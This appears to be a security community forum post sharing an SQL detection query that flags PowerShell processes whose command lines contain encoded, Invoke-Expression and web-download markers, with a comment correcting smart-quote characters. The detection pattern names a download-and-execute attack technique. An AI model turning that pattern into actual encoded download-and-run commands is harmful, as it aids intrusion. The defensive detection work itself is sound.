cancel
Showing results for 
Show  only  | Search instead for 
Did you mean: 
Access VMworld content on-demand if you missed the event. 70+ security focused sessions were offered -- access requires registration.

Malicious Powershell

Description: Detecting malicious powershell.

What The Data Shows: Looking for powershell arguments that can be linked to malicious executions.

SQL: 

SELECT *
FROM processes
WHERE cmdline LIKE "%enc%" 
AND cmdline LIKE "%IEX%" 
AND cmdline LIKE "%web%" 
AND name = “powershell.exe”

 

 

0 Votes
3 Comments
Community Manager
Community Manager
Status changed to: Approved
 
New Contributor

This script is using the right and left double quotation mark characters instead of the quotation mark character. If copied and pasted, the script won't run.

The amended version is:

SELECT *
FROM processes
WHERE cmdline LIKE "%enc%"
AND cmdline LIKE "%IEX%"
AND cmdline LIKE "%web%"
AND name = "powershell.exe"
Carbon Black Employee

@hardcoded Thanks for catching that and posting a fix! I did fix the original too.